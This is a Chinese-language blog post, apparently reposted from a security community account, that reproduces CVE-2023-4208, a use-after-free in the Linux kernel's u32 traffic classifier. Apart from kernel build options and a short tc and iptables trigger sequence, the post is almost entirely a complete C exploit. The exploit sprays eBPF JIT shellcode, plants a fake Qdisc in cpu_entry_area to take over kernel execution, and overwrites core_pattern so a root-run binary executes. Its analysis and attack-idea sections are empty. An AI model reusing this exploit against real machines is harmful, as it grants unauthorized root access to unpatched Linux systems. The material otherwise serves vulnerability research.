一
环境搭建
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/refs/tags
make memuconfig
make defconfig
# 为支持image需要开启
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
sudo make -j$(nproc) bzImage
二
漏洞介绍
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
CONFIG_NET_SCHED=y
CONFIG_CONFIGFS_FS=y #支持img
CONFIG_SECURITYFS=y #支持img
CONFIG_DEBUG_INFO=y #调试
CONFIG_USER_NS=y #支持新的namespace
CONFIG_USERFAULTFD=y #支持userfaultfd
CONFIG_NET_SCHED=y #漏洞触发必要选项
CONFIG_NET_CLS_U32=y #漏洞触发必要选项
CONFIG_NETFILTER_XT_TARGET_MARK=y
CONFIG_NET_SCH_DRR=y #使用drr
CONFIG_BPF=y #漏洞利用所必须
CONFIG_BPF_JIT=y #漏洞利用所必须
CONFIG_HAVE_EBPF_JIT=y #漏洞利用所必须
CONFIG_PREEMPT=y
三
POC
unshare --mount --uts --ipc --net --pid --fork --map-root-user --user --mount-proc /bin/sh
/bin/iptables-legacy -t mangle -A POSTROUTING -d 127.0.0.1/24 -j MARK --set-mark 1
ip link set dev lo up
/bin/tc qdisc add dev lo root handle 1: drr
/bin/tc class add dev lo parent 1: classid 1:10 drr quantum 60
/bin/tc filter add dev lo protocol ip prio 1 u32 match mark 1 0xff classid 1:10
/bin/tc filter change dev lo protocol ip prio 1 handle 800::800 u32 indev lo classid 1:2
/bin/tc class delete dev lo classid 1:10
四
漏洞分析
https://elixir.bootlin.com/linux/v5.10/source/net/sched/cls_u32.c#L841
五
调试
gdb -ex "target remote localhost:1234" -ex "file /mnt/hgfs/VMshare2/cve/all/CVE-2023-4208/vmlinux" -ex "c"
六
攻击思路
七
攻击成功
八
EXP
#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <asm/types.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <sys/ipc.h>
#include <sys/timerfd.h>
#include <sys/msg.h>
#include <fcntl.h>
#include <err.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <pthread.h>
#include <signal.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/sendfile.h>
#define SYSCHK(x) ({
typeof(x) __res = (x);
if (__res == (typeof(x))-1)
err(1, "SYSCHK(" #x ")");
__res;
})
#define PAUSE
{
printf(":");
int x;
read(0, &x, 1);
}
extern void write_to_cpu_entry_area(void *buf);
void handle(int s) {}
void set_cpu(int i)
{
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
int cfd[2];
int sfd[0x200][2];
char payload[0x1000];
char buf[0x1000];
struct sock_filter filter[0x1000];
int stopfd[2];
const int DRR_CLASS_SPRAY_THREADS = 0x100;
void *job(void *x)
{
size_t idx = (size_t)x;
write(cfd[1], buf, 1);
read(cfd[0], buf, 1);
set_cpu(0);
struct iovec iov = {buf, 0x1000};
struct msghdr mhdr = {
.msg_iov = &iov,
.msg_iovlen = 1,
.msg_control = payload,
.msg_controllen = 0x80};
sendmsg(sfd[idx][1], &mhdr, 0);
}
void do_spray(int times)
{
memset(payload,0,0x1000);
struct cmsghdr *first;
first = (struct cmsghdr *)payload;
first->cmsg_len = 0x400;
first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg
first->cmsg_type = 0x41414141;
/* Try to overwrite struct drr_class's qdisc at offset 0x60 */
/* That address is at CPU#1 cpu_entry_area's entry_stack_page (stack address) while it try to push r15 in function error_entry*/
*(size_t*)&payload[0x60] = 0xfffffe000003df58;
for (int i = 0; i < DRR_CLASS_SPRAY_THREADS; i++)
{
SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
int n = 0x800;
setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
write(sfd[i][1], buf, 0x1000);
}
pthread_t tid;
for (int i = 0; i < times; i++)
pthread_create(&tid, 0, job, (void*)(size_t)i);
//read(cfd[1], buf, DRR_CLASS_SPRAY_THREADS);
}
int sc(void)
{
set_cpu(1);
unsigned int prog_len = 0x900;
/* In current environment, the max instructions in a program is near 0x900
And we test 0x900 instructions * 0x50 forks * 0x100 sockets * 4 = 180 MB is enough large to spray and worked reliably
*/
struct sock_filter table[] = {
{.code = BPF_LD + BPF_K, .k = 0xb3909090},
{.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}};
/* 0xb3909090 is NOPsled shellclode to make exploitation more reliable
90 nop
90 nop
90 nop
b3 b8 mov bl, 0xb8
*/
for (int i = 0; i < prog_len; i++)
filter[i] = table[0];
filter[prog_len - 1] = table[1];
int idx = prog_len - 2;
#include "sc.h"
struct sock_fprog prog = {
.len = prog_len,
.filter = filter,
};
int fd[2];
for (int k = 0; k < 0x50; k++)
{
if (fork() == 0) // use fork to bypass RLIMIT_NOFILE limit.
{
close(stopfd[1]);
for (int i = 0; i < 0x100; i++)
{
SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
}
write(stopfd[0], buf, 1);
read(stopfd[0], buf, 1);
exit(0);
}
}
/* wait for all forks to finish spraying BPF code */
read(stopfd[1], buf, 0x50);
}
char POC[0x1000];
// the payload generated from `tc class delete dev lo classid 1:10`
// to generate payload from `tc` command, we can breakpoint at `netlink_sendmsg`
// after `tc` command is run, and we can dump the payload using this gdb command:
// dump binary memory /tmp/tc_del msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len
// refs: https://man7.org/linux/man-pages/man7/rtnetlink.7.html https://wiki.slank.dev/book/types.html
size_t DEL[] = {
0x0005002900000024, 0x00000000649bcb96,
0x0000000100000000, 0x0001000000010010,
0x0000000000000000};
int check_core()
{
// Check if /proc/sys/kernel/core_pattern has been overwritten
char buf[0x100] = {};
int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
read(core, buf, sizeof(buf));
close(core);
return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
int memfd = memfd_create("", 0);
if(memfd < 0) perror(memfd);
SYSCHK(sendfile(memfd, open("root1", 0), 0, 0xffffffff));
if(dup2(memfd, 666) < 0) perror("dup2");
close(memfd);
while (check_core() == 0)
sleep(1);
/* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */
*(size_t *)0 = 0;
}
void unshare_setup(uid_t uid, gid_t gid)
{
int temp, ret;
char edit[0x100];
ret = unshare(CLONE_NEWNET | CLONE_NEWUSER);
if (ret < 0)
{
perror("unshare");
}
temp = open("/proc/self/setgroups", O_WRONLY);
write(temp, "deny", strlen("deny"));
close(temp);
temp = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", uid);
write(temp, edit, strlen(edit));
close(temp);
temp = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", gid);
write(temp, edit, strlen(edit));
close(temp);
return;
}
#include "key.h"
#include "pg_vec.h"
#include "sendmsg.h"
size_t data[0x1000];
int main(int argc, char **argv)
{
if (fork() == 0) // this process is used to find our process by `pidof billy`
{
set_cpu(1);
strcpy(argv[0], "billy");
while (1)
sleep(1);
}
if (fork() == 0) // this process is used to trigger core_pattern exploit
{
set_cpu(1);
setsid();
crash("");
}
setvbuf(stdout, 0, 2, 0);
unshare_setup(getuid(), getgid());
socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd);
struct rlimit rlim = {
.rlim_cur = 0xf000,
.rlim_max = 0xf000};
setrlimit(RLIMIT_NOFILE, &rlim);
char *core = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
strcpy(core, "|/proc/%P/fd/666"); // put payload string into known address which will used by ebpf shellcode
int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); // later use this socket to trigger vuln
set_cpu(1);
puts("spray ebpf program.");
sc(); // spray ebpf program.
puts("spray ebpf done");
getchar();
//do_spray(); // prepare spray thread first.
set_cpu(0);
/*
ip link set dev lo up
tc qdisc add dev lo root handle 1: drr
tc class add dev lo parent 1: classid 1:10 drr quantum 60
tc filter add dev lo parent 1: pref 100 protocol ip handle 1 fw classid 1:10
tc filter replace dev lo pref 100 protocol ip handle 1 fw classid 1:10
*/
/*
generated using gdb command after breakpoint on netlink_sendmsg:
dump binary memory /tmp/POC msg->msg_iter.iov[0].iov_base msg->msg_iter.iov[0].iov_base+msg->msg_iter.iov[0].iov_len
*/
{
int poc_fd = open("./POC1", O_RDONLY);
read(poc_fd, POC, 0x1000);
write(fd, POC, 0x1000);
}
write(fd, DEL, 0x24); // tc class delete dev lo classid 1:10
//write(cfd[1], buf, 0x200); // spray kmalloc-0x80 to reallocate.
for(int i = 1; i <= 3; i++){ ///RCU宽限期
printf("sleep %dn", i);
sleep(1);
}
/*int kids[0x100];
char pay[0x1000];
size_t addr1 = 0xfffffe0000000000;
memset(pay, 0, sizeof(pay));
//memset(pay, 1, 96);
int quantum = 60;
memcpy(pay+0x60-0x18, &addr1, 8);
memcpy(pay+0x68, &quantum, 4);
spray_key_data(kids, 62, 96, pay);*/
int pfds[0x100];
char *pages[0x100];
for(int i = 0; i < 0x80; i++){
pfds[i] = pagealloc_pad(16, 0x1000);
if(pfds[i] < 0) perror("pagealloc_pad");
}
for(int i = 0; i < 0x80; i++){
pages[i] = mmap(NULL, 0x1000*16, PROT_READ|PROT_WRITE, MAP_SHARED, pfds[i], 0); //mmap的size要和addr对齐
if (pages[i] == MAP_FAILED) {
perror("mmap");
exit(-1);
}
}
size_t goal_addr = 0xffffffffc2003000;
for(int i = 0; i < 0x80; i++){
memcpy(pages[i]+12*0x1000, &goal_addr, 8);
}
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(80),
.sin_addr.s_addr = inet_addr("127.0.0.1"),
};
size_t fake_qdisc_struct[0x10] = {};
/* Overwrite struct Qdisc's enqueue which is function ptr
struct Qdisc {
int (*enqueue)(struct sk_buff *, struct Qdisc *, struct sk_buff * *);
struct sk_buff * (*dequeue)(struct Qdisc *);
unsigned int flags;
*/
fake_qdisc_struct[0] = 0xffffffffcc000000 - 0x800;
/*
eBPF generated shellcode is lay in this range, we spray eBPF multiple times and summarize it's often near in this page.
It's more reliabe we choose address in the middle of the page
ffffffffa0000000 |-1536 MB | fffffffffeffffff | 1520 MB | module mapping space
*/
int c = socket(AF_INET, SOCK_DGRAM, 0);
if (fork() == 0) // Put payload in fixed kernel address (CVE-2023-0597)
{
set_cpu(1);
signal(SIGFPE, handle);
signal(SIGTRAP, handle);
signal(SIGSEGV, handle);
setsid();
write_to_cpu_entry_area(fake_qdisc_struct);
}
sleep(1);
int mark = 1;
if (setsockopt(c, SOL_SOCKET, SO_MARK, &mark, sizeof(mark)) < 0) {
perror("setsockopt");
}
else printf("set mark successful!");
/* Trigger Qdisc filter our packet and control kernel RIP */
SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr)));
SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr)));
SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr)));
SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr)));
}
#include <sys/mman.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/if_ether.h>
#include <fcntl.h>
void err_exit(char *s){
perror(s);
exit(-1);
}
void unshare_setup1(void)
{
char edit[0x100];
int tmp_fd;
if(unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET))
err_exit("FAILED to create a new namespace");
tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);
tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}
void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout) {
int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0) puts("setsockopt(PACKET_VERSION)"), exit(-1);
struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;
rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0) puts("setsockopt(PACKET_RX_RING)"), exit(-1);
}
int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) puts("socket(AF_PACKET)"), exit(-1);
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;
int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0) puts("bind(AF_PACKET)"), exit(-1);
return s;
}
// count 为 pg_vec 数组的大小, 即 pg_vec 的大小为 count*8
// size/4096 为要分配的 order
int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}
参考
看雪ID:mb_btcapvow
https://bbs.kanxue.com/user-home-975602.htm
# 往期推荐
2、恶意木马历险记
球分享
球点赞
球在看
点击阅读原文查看更多
原文始发于微信公众号(看雪学苑):CVE-2023-4208复现笔记